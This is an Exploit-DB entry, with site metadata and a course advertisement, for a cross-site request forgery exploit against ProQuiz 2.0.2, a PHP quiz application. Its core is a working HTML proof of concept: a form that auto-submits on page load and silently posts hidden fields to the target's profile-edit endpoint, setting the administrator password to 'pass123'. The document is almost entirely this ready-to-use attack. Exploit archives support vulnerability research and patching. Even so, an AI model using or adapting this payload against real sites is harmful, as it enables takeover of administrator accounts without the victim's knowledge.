ProQuiz 2.0.2 - Cross-Site Request Forgery

EDB-ID:

20550

CVE:



Author:

DaOne

Type:

webapps


Platform:

PHP

Date:

2012-08-16


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

##########################################

[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability

[~] Author: DaOne

[~] Date: 19/8/2012

[~] Software Link: http://code.google.com/p/proquiz/downloads/list

##########################################



[#] [ CSRF Change Admin Password ]



</form>

<html>

<body onload="document.form0.submit();">

<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">

<input type="hidden" name="password" value="pass123"/>

<input type="hidden" name="cpassword" value="pass123"/>

</form>

</body>

</html>



##########################################